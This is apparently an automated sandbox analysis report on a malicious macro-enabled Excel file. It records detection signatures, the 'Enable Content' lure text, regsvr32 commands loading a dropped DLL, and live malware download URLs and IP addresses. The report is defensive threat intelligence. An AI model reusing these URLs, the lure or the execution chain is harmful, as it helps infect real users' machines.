Loading ...

Play interactive tourEdit tour

Analysis Report documents-2112491607.xlsm

Overview

General Information

Sample Name:documents-2112491607.xlsm
Analysis ID:383123
MD5:cada6b07929cd03002206f65f547f383
SHA1:e4b72830f1f320d711f60f540a8fe9340597238e
SHA256:b9b231cad810dedef1d27772b12d04e8aa4e9ef0f461d5a0fbf80d3c38918860
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Allocates a big amount of memory (probably used for heap spraying)
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2508 cmdline: regsvr32 -s ..\oeiwkd MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2496 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2552 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2604 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2544 cmdline: regsvr32 -s MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://kautilyaclasses.com/ds/index.htmlAvira URL Cloud: Label: malware
    Source: http://kullumanalitours.com/ds/index.htmlAvira URL Cloud: Label: malware
    Machine Learning detection for dropped fileShow sources
    Source: C:\Users\user\oeiwkd4.dllJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJoe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: index[1].htm.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: excel.exeMemory has grown: Private usage: 4MB later: 126MB
    Source: global trafficDNS query: name: katelynn9506a.ru.com
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 8.211.4.209:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 8.211.4.209:80

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2009897 ET TROJAN Possible Windows executable sent when remote host claims to send html content 111.118.215.222:80 -> 192.168.2.22:49171
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: katelynn9506a.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: corwin-tommie06f.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kautilyaclasses.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kullumanalitours.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bodylanguage.santulan.co.inConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45BFE498.pngJump to behavior
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: katelynn9506a.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: corwin-tommie06f.ru.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kautilyaclasses.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kullumanalitours.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/index.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bodylanguage.santulan.co.inConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: katelynn9506a.ru.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Wed, 07 Apr 2021 07:15:00 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 78Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /index.html was not found on this server.
    Source: regsvr32.exe, 00000003.00000002.2091998985.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092597864.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2093476995.0000000001C10000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094439546.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2094938735.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
    Source: Screenshot number: 4Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 15Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
    Source: Document image extraction number: 15Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
    Source: Screenshot number: 8Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: documents-2112491607.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: documents-2112491607.xlsmInitial sample: Sheet size: 27819
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file
    Source: workbook.xmlBinary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_open">'Doc1'!$AO$41</definedName></definedNames><calcPr calcId="122211"/></workbook>
    Source: classification engineClassification label: mal100.expl.evad.winXLSM@11/12@5/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$documents-2112491607.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC4E4.tmpJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\oeiwkd
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\oeiwkd
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: documents-2112491607.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\oeiwkd4.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htmJump to dropped file
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading121OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\oeiwkd4.dll100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    kautilyaclasses.com0%VirustotalBrowse
    bodylanguage.santulan.co.in0%VirustotalBrowse
    corwin-tommie06f.ru.com4%VirustotalBrowse
    katelynn9506a.ru.com2%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://corwin-tommie06f.ru.com/index.html0%Avira URL Cloudsafe
    http://kautilyaclasses.com/ds/index.html100%Avira URL Cloudmalware
    http://katelynn9506a.ru.com/index.html0%Avira URL Cloudsafe
    http://bodylanguage.santulan.co.in/ds/index.html0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://kullumanalitours.com/ds/index.html100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    kautilyaclasses.com
    192.185.56.250
    truefalseunknown
    bodylanguage.santulan.co.in
    111.118.215.222
    truetrueunknown
    corwin-tommie06f.ru.com
    8.211.4.209
    truefalseunknown
    katelynn9506a.ru.com
    8.211.4.209
    truefalseunknown
    kullumanalitours.com
    103.211.216.55
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://corwin-tommie06f.ru.com/index.htmlfalse
      • Avira URL Cloud: safe
      unknown
      http://kautilyaclasses.com/ds/index.htmltrue
      • Avira URL Cloud: malware
      unknown
      http://katelynn9506a.ru.com/index.htmlfalse
      • Avira URL Cloud: safe
      unknown
      http://bodylanguage.santulan.co.in/ds/index.htmltrue
      • Avira URL Cloud: safe
      unknown
      http://kullumanalitours.com/ds/index.htmltrue
      • Avira URL Cloud: malware
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2091998985.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2092597864.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2093476995.0000000001C10000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094439546.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2094938735.0000000001D30000.00000002.00000001.sdmpfalse
      • Avira URL Cloud: safe
      low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      103.211.216.55
      kullumanalitours.comSeychelles
      394695PUBLIC-DOMAIN-REGISTRYUSfalse
      192.185.56.250
      kautilyaclasses.comUnited States
      46606UNIFIEDLAYER-AS-1USfalse
      8.211.4.209
      corwin-tommie06f.ru.comSingapore
      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
      111.118.215.222
      bodylanguage.santulan.co.inIndia
      394695PUBLIC-DOMAIN-REGISTRYUStrue

      General Information

      Joe Sandbox Version:31.0.0 Emerald
      Analysis ID:383123
      Start date:07.04.2021
      Start time:09:14:09
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 38s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:documents-2112491607.xlsm
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:9
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLSM@11/12@5/4
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsm
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe
      • TCP Packets have been reduced to 100

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      103.211.216.55documents-1660683173.xlsmGet hashmaliciousBrowse
      • kullumanalitours.com/ds/index.html
      192.185.56.250documents-1660683173.xlsmGet hashmaliciousBrowse
      • kautilyaclasses.com/ds/index.html
      8.211.4.209documents-1660683173.xlsmGet hashmaliciousBrowse
      • corwin-tommie06f.ru.com/index.html
      1234.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      12345.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      1234.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-748443571.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      12345.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-1887159634.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-748443571.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-1887159634.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-683917632.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-683917632.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-1760163871.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      documents-1760163871.xlsmGet hashmaliciousBrowse
      • mills-skyla30ec.com/gg.gif
      111.118.215.222documents-1660683173.xlsmGet hashmaliciousBrowse
      • bodylanguage.santulan.co.in/ds/index.html
      2.docGet hashmaliciousBrowse
      • www.sewakalharamain.com/we/?id=eCqvZjB9yzZjHVFsBS3mbpFyF5bew9YaktCBlpiiLzXEFgX7f8Dr16PTLdsD9yaPgJU3/B/m1OJYSyq3LB7PQg==&6lv=zfMHXnZ0VbCxh&sql=1

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      bodylanguage.santulan.co.indocuments-1660683173.xlsmGet hashmaliciousBrowse
      • 111.118.215.222
      kullumanalitours.comdocuments-1660683173.xlsmGet hashmaliciousBrowse
      • 103.211.216.55
      corwin-tommie06f.ru.comdocuments-1660683173.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      kautilyaclasses.comdocuments-1660683173.xlsmGet hashmaliciousBrowse
      • 192.185.56.250
      katelynn9506a.ru.comdocuments-1660683173.xlsmGet hashmaliciousBrowse
      • 8.211.4.209

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCdocuments-1660683173.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      0406_37400496097832.docGet hashmaliciousBrowse
      • 8.208.95.92
      32_64_ver_2_bit.exeGet hashmaliciousBrowse
      • 8.209.67.151
      1234.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      12345.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      1234.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-748443571.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      12345.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-1887159634.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-748443571.xlsmGet hashmaliciousBrowse
      • 8.211.4.209
      documents-1887159634.xlsmGet hashmaliciousBrowse
